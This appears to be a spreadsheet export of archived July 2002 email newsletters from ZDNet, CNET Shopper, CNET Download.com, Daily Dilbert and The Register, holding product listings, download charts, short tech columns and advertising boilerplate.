\n![]([URL]http://www.zdnet.com[/URL]  \n**5**.  HP OfficeJet d145  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://techupdate.zdnet.com[/URL]**More popular\nprinters**  \n![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![News\nAnalysis]([URL]http://www.zdnet.com[/URL]  \n| **  SYLVIA CARR** |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n![SYLVIA\nCARR]([URL]http://www.zdnet.com[/URL]  \n|   | ![]([URL]http://www.zdnet.com[/URL]  \n**New Windows XP on the way... Hackers get life... Bluetooth blues**  \nMicrosoft reveals details about a new version of Windows XP with all sorts of\nnew digital-media features. Plus: The House gets tough on cybercrime. And\ndemand for Bluetooth softens along with the weak mobile market.  \n---|---|---  \n  \n![News\nAnalysis]([URL]http://www.zdnet.com[/URL]  \n**  DAVID MORGENSTERN** |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n![DAVID\nMORGENSTERN]([URL]http://www.zdnet.com[/URL]  \n|   | ![]([URL]http://www.zdnet.com[/URL]  \n**When is tiny too teensy? Your ideas on mini-gadgets**  \nSome of you think mini-notebooks are too small to be truly useful. But others\nsay they're ideal for those who need to carry around their computer all day--\nand were never meant for everyone, anyway. David digests your comments.  \n---|---|---  \n  \n**QuickPoll results: Would you want a super-tiny Sony Vaio U1?**\n\n![Expert\nAdvice]([URL]http://www.zdnet.com[/URL]  \n**  ROBERT VAMOSI** |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n![ROBERT\nVAMOSI]([URL]http://www.zdnet.com[/URL]  \n|   | ![]([URL]http://www.zdnet.com[/URL]  \n**How to protect yourself against worms of the future**  \n![]([URL]http://www.zdnet.com[/URL]  \nIt's been a year since the Code Red worm wreaked havoc on the Net. What's\nchanged? Worms and viruses have gotten sneakier. But your antivirus software\nhasn't. Worried? Robert tells you how to prepare for future threats.  \n---|---|---  \n  \n**  JOHN MORRIS AND JOSH TAYLOR** |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n![JOHN MORRIS AND JOSH\nTAYLOR]([URL]http://www.zdnet.com[/URL]  \n|   | ![]([URL]http://www.zdnet.com[/URL]  \n**MS home networking: What's in it for you**  \n![]([URL]http://www.zdnet.com[/URL]  \nMicrosoft is jumping into the wireless arena with a line of home-networking\nequipment. What does this mean to you? Networking gear that's easier to use\nand more secure than what's out there today, say Josh and John.  \n---|---|---  \n  \n**  PRESTON GRALLA** |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n![PRESTON\nGRALLA]([URL]http://www.zdnet.com[/URL]  \n|   | ![]([URL]http://www.zdnet.com[/URL]  \n**Get a great HTML editor--for free**  \n![]([URL]http://www.zdnet.com[/URL]  \nWhether you're a weekend Web warrior or a full-time site builder, you need a\ncapable HTML editor. But you don't have to spend a lot of money to get one.\nPreston has three free tools that help you build Web pages in a jiffy.  \n---|---|---  \n  \n* * *\n\n**AnchorDesk Home** | **Previous Issue**\n\n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL]  \n| ![]([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areers | ![]([URL]http://www.zdnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n|\n\n  \n**Copyright 2002 CNET Networks, Inc. All rights reserved. ZDNet is a\nregistered service mark of CNET Networks, Inc.**\n\n|\n\n![]([URL]http://gserv.zdnet.com[/URL]  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.zdnet.com http://www.zdnet.com http://i.i.com.com http://www.techrepublic.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qqqqqqqqqq-cnet-newsletters@example.com\nFrom: "CNET Shopper Newsletter: PDA Edition" &lt;Online#3.20304.83-p1SYlJ1blFvQjRRR.1@newsletter.online.com&gt;\nDate: Wed, 17 Jul 2002 05:41:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 05:41:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>"CNET Shopper Newsletter: PDA Edition" &lt;Online#3.20304.83-p1SYlJ1blFvQjRRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Check out the new CLIE PEG-T665C from Sony! (CNET SHOPPER)</t>
  </si>
  <si>
    <t>\n\n![CNET Shopper PDA Edition]([URL]http://www.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n|  \n---  \n  \n![]([URL]http://www.techrepublic.com[/URL]  \n![]([URL]http://ad.doubleclick.net[/URL];sz=160x600;ord=\[timestamp\]?)\n\n  \n![CNET Search.com]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://cnet.com[/URL]  \n  \nShopper All CNET The Web  \n---  \n  \n![Most Popular]([URL]http://home.cnet.com[/URL]  \n1 | Cyber Shot DSC-F707  \n  \n---|---  \n2 | Canon PowerShot S40  \n  \n3 | Palm m515  \n  \n4 | Nikon Coolpix 995  \n  \n5 | Canon PowerShot G2  \n  \n![ ]([URL]http://www.cnet.com[/URL]  **All most popular**  \n---  \n  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |  |  |  | ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] |  **Sony CLIE\nPEG-T665C**  \nÂ• 66MHz processor  \nÂ• Transflective LCD  \nÂ• 16MB of RAM  \nÂ• MP3 playback  \nÂ• Strong infrared port  \nÂ• **Just $354**  \n![](/b.gif)  \n![]([URL]http://shopper.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n**Accessorize this PDA:**  \nSony Mini Keyboard  |  Sony AC Adapter  \nSony Memory Stick Module |  Sony Carrying Case  \n![]([URL]http://www.cnet.com[/URL]  \nLooking to upgrade your PDA's memory? No matter what type of handheld you use,\nCNET's Memory Confiturator makes finding the perfect memory upgrade easier\nthan ever. You're just a few clicks away from maximizing your PDA's potential!\n\nCheck out CNET's new **Memory Configurator**  \n![]([URL]http://www.cnet.com[/URL]  \n  \n\n![Featured]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://shopper.cnet.com[/URL] |  **Palm m130**  \nÂ• Free shipping available  \nÂ• 8MB, Palm OS v4.1  \nÂ• 65,000-color screen  \n   **Just $210 **  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |  **Palm m515**  \nÂ• Fusion of style and power  \nÂ• 16MB, Palm OS v4.1  \nÂ• MultiMediaCard slot  \n   **Just $312**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |  **Palm i705**  \nÂ• 8MB, USB, rechargeable  \nÂ• Wireless Internet access  \nÂ• Always-on e-mail  \n   **Just $299**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |  **Sony CLIE\nPEG-T615C**  \nÂ• 16MB, USB, rechargeable  \nÂ• 16-bit color display  \nÂ• Palm OS 4.1  \n   **Just $251 **  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |  **Toshiba Pocket\nPC e310**  \nÂ• Powerful mobile productivity  \nÂ• 3.5-inch TFT display/65K colors  \nÂ• Plays MP3/video files  \n   **Just $329 **  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |  **Compaq iPaq\nH3835**  \nÂ• Free shipping available  \nÂ• 64MB, brilliant TFT screen  \nÂ• 206MHz Intel processor  \n   **Just $425**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |  **Sony CLIE PEG-\nNR70V**  \nÂ• Built-in digital camera/MP3  \nÂ• Built-in keyboard/color display  \nÂ• 16MB, Palm OS 4.1  \n   **Just $517**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |  **Compaq iPaq\nH3870**  \nÂ• Incl. MS Pocket PC 2002  \nÂ• 64MB, integrated Bluetooth  \nÂ• 206MHz, 64K color, USB  \n   **Just $539**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n  \n  \n\n![Special Feature]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n---  \nDid you know that ChannelOnline empowers you to compare detailed product\nspecifications feature-for-feature?\n\nSelect the items you wish to compare from your customer- specific catalog of\nmore than 250,000 SKUs. The product comparison highlights differences between\nthe products in red, allowing your sales reps and customers to easily identify\nthe main differences between each product selected. This comparison can then\nbe e-mailed to your customers to assist them in making a more informed buying\ndecision.\n\n**Sign up now** to gain access to the most complete, accurate, and timely\nproduct data available.\n\n**Tell me more about ChannelOnline.**\n\n![On the CNET Network]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**\n\n  * Tech Trends\n  * Hardware\n  * Software\n  * Shopping\n  * Downloads \n** |  **\n\n  * News\n  * Investing\n  * Electronics\n  * Web Building\n  * Help &amp; How-Tos \n** |  **\n\n  * Internet\n  * Games\n  * Message Boards\n  * CNET TV &amp; Radio\n  * Music Center\n\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42&amp;ISSUE=2002-07-17)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://www.techrepublic.com http://ad.doubleclick.net http://a.r.tv.com http://cnet.com http://home.cnet.com http://www.cnet.com http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.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zdnet@example.com\nFrom: "CNET Download.com for PC" &lt;Online#3.20224.c4-ddW5l6ay9S9K-sRR.1@newsletter.online.com&gt;\nDate: Wed, 17 Jul 2002 04:09:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 04:09:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>"CNET Download.com for PC" &lt;Online#3.20224.c4-ddW5l6ay9S9K-sRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>This week: Rhapsody rules</t>
  </si>
  <si>
    <t>![Download Dispatch - PC Edition]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n  \n|  ![Search Download.com]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://cnet.com[/URL]  \n  \nDownloads All CNET The Web  \n---  \n  \n![Updates &amp; Drivers]([URL]http://www.cnet.com[/URL]  \nIn Utilities:  \n**CloneCD 4.0**\n\nIn Audio:  \n**Sound Forge 6.0a build 150**\n\n**Media Jukebox 8.0.32**\n\nIn Internet:  \n**Accelerate 2K2 3**\n\nIn Multimedia:  \n**FotoTime FotoAlbum 3.0.2**\n\nIn Web Authoring:  \n**J-Perk 6.04**\n\n**TextSOAP 1.5.2**\n\nIn Business &amp; Finance:  \n**FileMaker Pro 6.0v2**\n\nIn Games:  \n**Balls of Steel Patch 1.3**  \n  \n---  \n![Software\n\nUpgrades]([URL]http://a.r.tv.com[/URL]  \n\n| **Most Popular Upgrades:**  \n  \n---  \n**  1.** |  ZoneAlarm Pro 3.0  \n**  2.** |  Norton AntiVirus 2002  \n**  3.** |  AdSubtract Pro 2.5  \n**  4.** |  Microsoft Windows XP - Professional  \n**  5.** |  Nero Burning ROM 5.5  \n**  6.** |  Reason 2.0  \n**  7.** |  Microsoft Windows XP - Home Edition  \n**  8.** |  QuickBooks Pro 2002  \n**  9.** |  Adobe Photoshop 7.0  \n**10.** |  WinZip 8.1  \n  \nFind a complete list of the 50 most popular software products at **CNET\nShopper.com**.  \n  \n![Also from\nCNET]([URL]http://home.cnet.com[/URL]  \n**Summer 2002 software\n\nTest your bandwidth\n\nNew jobs, click here!\n\nInside HP\n\nBluetooth: speeds up **  \n---  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  | ![]([URL]http://www.cnet.com[/URL] |  **July\n9, 2002**  \n![]([URL]http://www.cnet.com[/URL]  \n  \n---|---  \n![]([URL]http://download.com.com[/URL]\n\n**Rhapsody rules**  \nI never thought IÂ’d say it, but IÂ’m changing my tune about subscription music\nservices.\n\nWhen MusicNet and Pressplay launched their monthly subscription services late\nlast year, I was unimpressed. Their music catalogs were limited, the software\nwas clunky, and the copyright protection features seemed unduly restrictive. I\nwondered how they could ever compete with the seductive (read: free) charms of\nfile sharing. But last week I decided to try out Listen.comÂ’s Rhapsody, a\nsubscription streaming music service that recently managed to secure\nrecordings from all five major labels. And now IÂ’m rethinking my stance.\n\nRhapsody is not for everyone. If you like to burn your MP3s to CD or download\nthem to a portable player, youÂ’ll want to look elsewhere; Rhapsody allows CD\nburning only for a small portion of its catalog, and only for an extra charge,\nand you canÂ’t download MP3s at all. But what Rhapsody does have is music, and\nlots of it--thousands of albums of all major genres on demand as well as tons\nof preprogrammed radio stations. I think Listen.com might be onto something\nwith its streaming service. Would you pay 10 bucks a month for a service that\nhas all the music you could ask for, but won't allow you to actually download\nMP3s? Let me know at edit@download.com\n\nKelly Green  \nDirector, CNET Download.com\n\n| ![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n| ![Reviews &amp; Features]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://download.com.com[/URL]  \n---  \n** Power Downloader fixes his computer **  \nSometimes even a superhero has to handle mundane computer maintenance. Power\nDownloader's Weekly Picks returns with four apps that will save your PC from\nitself.  \n  \n  \n  \n** Protect your PC **  \nIt almost seems like there's a new virus in the news every week. Of course,\nyou want to protect your PC. But how? CNET Software editors walk you through\n10 antivirus options.  \n  \n![CNET's Exclusive\nDownloads]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \nNew products from our sponsors  \n![]([URL]http://www.cnet.com[/URL]  \n**New Window Washer 4.7**  \nWhat you do online is nobody's business. Take control with Window Washer.\nProtect your privacy, clean unwanted files, and boost PC performance. Download\na free trial version today.  \n  \n**Magic: The Gathering Online **  \nHave the deadliest strategies all at your control. Experience the most\ncompetition. There's always a game on. As your game grows, new challenges\nawait.  \n  \nAll Download Launchpad titles powered by Download Express--CNET's new speedy\ndownload service!  \n  \n![This Week's Top Ten Downloads]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \nKaZaA remains at the top, our very own CNET CatchUp moves up a couple spots to\nNo. 8, and Download Accelerator drops 2 spots to round out the list at No. 10\n|  **Most Popular Titles**  \nWeek ending July 14 |  **Last  \nWeek** |  **Weeks  \non Chart** |  **Downloads  \nThis Week**  \n---|---|---|---|---  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n1. |  **KaZaA Media Desktop** | 1 | 11 | 2,251,808  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n2. |  **ICQ 2002a** | 3 | 251 | 609,430  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n3. |  **Morpheus** | 2 | 63 | 565,410  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n4. |  **WinZip** | 4 | 300 | 452,540  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n5. |  **iMesh** | 5 | 116 | 353,287  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n6. |  **BearShare** | 6 | 74 | 177,000  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n7. |  **Ad-aware** | 7 | 44 | 156,911  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n8. |  **CNET CatchUp 1.31** | 10 | 115 | 114,250  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n9. |  **Qtraxmax** | 9 | 4 | 110,923  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n10. |  **Download Accelerator** | 8 | 135 | 109,139  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n  \n![This Week's Top Movers]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \nHere are some of the fastest-rising downloads on our Most Popular list.  \n  \n| **Top Movers** | **The Rundown**  \n---|---|---  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n1. | **LimeWire** | As always, people continue to search for the perfect file-swapping client as this P2P tool moves up 3 spots to No. 13.  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n2. | **QuickTime** | MPEG-4 technology, skip protection, and several other features in the latest update move Apple's media player up the list 5 spots to No. 29.   \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n3. | **Tony Hawk's Pro Skater** | One of the most popular games on any platform, this classic provides great gameplay as it volleys up the list 13 spots to No. 36.  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n4. | **WindowBlinds** | Custom desktop skins prove popular as this utility rises up 4 spots to No. 41.  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n5. | **FlashGet** | The latest update for this utility, which splits up files for faster downloading, makes a showing at No. 45.  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n  \nWant more? See our **Top 50** downloads.\n\n![Picks of the Week]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**In Audio**  \n  \n**DFX Collection 6.1**  \nFree to try; $20 to buy  \nFile size: Varies by file  \nMinimum requirements: Windows (all); Winamp, Sonique, Media Jukebox,\nMusicMatch Jukebox, or RealPlayer/RealOne/RealJukebox  \n  \nGive your software music player a little more bounce to the ounce with this\nset of audio enhancement utilities. The settings in DFX give you controls for\nadjusting fidelity, ambience, 3D surround, dynamic gain, and bass boost. New\nadditions include processing that optimizes your music for headphone listening\nand a flexible skinning system with hundreds of customizable skins to choose\nfrom. There are separate versions of DFX available for Winamp, Sonique, Media\nJukebox, MusicMatch, and Realmedia audio players.\n\n**In Internet**  \n  \n**Opera 6.04**  \nFree to try; $39 to buy  \nFile size: 3.41MB  \nMinimum requirements: Windows 95/98/Me/NT/2000/XP  \n  \nSurf like a pro with the latest update of this high-performance Web browser.\nOpera gives you SLL support, tons of keyboard shortcuts, the choice of a\nsingle- or multiple-document interface, and a lot of other useful features.\nThis update includes minor enhancements and bug fixes.\n\nWant to review Opera? Submit your opinion here.\n\n**In Multimedia**  \n  \n**3D Canvas 5.7**  \nFree  \nFile size: 6.69MB  \nMinimum requirements: Windows 95/98/Me/2000/XP, DirectX 8.0  \n  \nBring pixels to life with this intuitive 3D modeling and animation tool. 3D\nCanvas incorporates a drag-and-drop approach to 3D modeling and gives you\ntools to deform, sculpt, and paint 3D objects. You can also create animated\nscenes simply by positioning the objects within keyframes. Other features let\nyou save your animated scenes as AVI files, customize the interface so only\nthose items you use most frequently are visible, and more. Best of all, the\nstandard version of 3D Canvas is a free product--learn to use it, then get the\nenhanced version for game development and rendering photo-realistic images.\n\nWant to review 3D Canvas? Submit your opinion here.\n\n**In Utilities**  \n  \n**PrintMagic 1.0**  \nFree to try; $24.95 to buy  \nFile size: 592K  \nMinimum requirements: Windows 98/NT/2000/Me/XP  \n  \nMake quick work of your clipboard notations and printing tasks with this\nsimple and very handy app. PrintMagic allows you to quickly and easily select\nand print content from almost any application using a drag-and-drop interface\nor its innovative Printboard. Plus, the cost savings and productivity\nenhancements provided by PrintMagic are multiplied for any organization that\nuses many computers.\n\nWant to review PrintMagic? Submit your opinion here.\n\n**In Games**  \n  \n**ChessRally 2.4**  \nFree to try; $20 to buy  \nFile size: 8.58MB  \nMinimum requirements: Windows 95/98/Me/NT/2000/XP  \n  \nPlay chess over the Internet, against the computer, or through e-mail with\nthis full-featured game, which offers a customizable interface with free\ndownloadable themes. If you get stuck, ChessRally even delivers move\nsuggestions. Blue has nothing on you.\n\nWant to review ChessRally? Submit your opinion here.\n\n![Overheard on Download.com]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**Here are some representative responses from last week's question on who\nshould take the blame for Web sites not being compatible in every browser:**\n\n_"Web builders should be doing as much as possible to support the broadest\npossible usage by their target audience"_\n\nA little over half the responses put the onus of compatibility on builders.\n\n_"There are far less browser makers than there are Web builders and users. So\nit doesn't make sense for users or Web builders to do that job does it?."_\n\nAfter Web builders, browser manufacturers got the most blame, although this\nresponse makes the best argument.\n\n_"The ordinary users are one group most at fault since they tend to stick to\nonly one browser."_\n\nFew responses said users should take responsibility, as most respondents fall\ninto the Web user category.\n\n_"As a professional designer, I say proprietary code is downright evil, no\nmatter who it comes from--and no matter what nifty trick it does."_\n\nQuite a number of Web builders wrote in, with many taking responsibility while\nnoting the difficulty of testing in every browser.\n\n_"Because Web pages are viewed 90 percent of the time by IE it is\nunderstandable that the time spent to make a site compatible with the\nremaining tiny minority has to be justified."_\n\nA few responses quoted server logs, making the point that it's not cost\nefficient to make sites compatible for people who choose a low-market share\nbrowser.  \n  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![Sign up for more free newsletters from\n\nCNET!]([URL]http://a.r.tv.com[/URL]  \nThe e-mail address for your subscription is\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15-03&amp;ISSUE=2002-07-17)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://cnet.com http://www.cnet.com http://a.r.tv.com http://home.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://download.com.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://download.com.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dilbert@example.com\nFrom: Daily Dilbert &lt;2.20803.e3-IczdlShkrpJ3.1@ummail4.unitedmedia.com&gt;\nDate: Wed, 17 Jul 2002 03:43:17 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 03:43:17 -0400 (EDT)</t>
  </si>
  <si>
    <t>Daily Dilbert &lt;2.20803.e3-IczdlShkrpJ3.1@ummail4.unitedmedia.com&gt;</t>
  </si>
  <si>
    <t>qqqqqqqqqq-dilbert@example.com</t>
  </si>
  <si>
    <t>Your Daily Dilbert 07/17/2002</t>
  </si>
  <si>
    <t>--25685224.1026891797705.JavaMail.root.umsan1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit E-mail error You're subscribed to the HTML version of the Daily Dilbert, which shows the comic strip as a graphic, but your mail system either can't support HTML or is set up to remove HTML content. For more information, contact your Internet service provider or mail system administrator. To change to a plain text subscription, modify your account preferences at  [URL]http://www.dilbert.com[/URL] The plain text option appears toward the bottom of the modification page. --25685224.1026891797705.JavaMail.root.umsan1 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Daily Dilbert =09=09 =09=09 =09=09=09 =09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=0907/17/2002 =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09&lt;= IMG SRC=3D"[URL]http://www.comics.com[/URL]" WIDTH= =3D"4" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt; =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09Hi Justin, enjoy your daily comic from Dilbert.com.If you like the Daily Dil= bert, tell a friend! Click here to send mail= =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09= Complete your collection while pretending to work! &gt; Shop =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09They're character-shaped, in colle= ctible tins.&gt; Shop&lt;= /TD&gt; =09=09=09=09=09 =09=09=09=09=09Get any Dilbert strip publ= ished in the last 90 days printed on aT-shirt, sweatshirt or poster. Se= lected older strips are also available. &gt; Shop =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09View all pro= ducts =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 Modify Your Account/UnsubscribeB= uy This StripÂ Â Â Send This=  Strip to a FriendÂ Â Â Month of Dilbert&amp;nb= sp;Â  =09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09Unsubscribe | = Modify Your Subscription | Request a New=  Subscription | Report S= ubscription Problems Subscribe to the Dilbert Newsletter/Join Dog= bert's New Ruling Class | Dilbert on Your Site/Intranet | Advertising Info | Dilbert in Your Publication =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09 =09=09 =09=09 =09=09=09 =09=09 =09=09=09 =09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09 =09 --25685224.1026891797705.JavaMail.root.umsan1--</t>
  </si>
  <si>
    <t>http://www.dilbert.com http://www.comics.com</t>
  </si>
  <si>
    <t>To: Reg Subscribers &lt;update@list.theregister.co.uk&gt;\nFrom: update@list.theregister.co.uk\nDate: Wed, 17 Jul 2002 03:00:01 +0100</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 03:00:01 +0100</t>
  </si>
  <si>
    <t>update@list.theregister.co.uk</t>
  </si>
  <si>
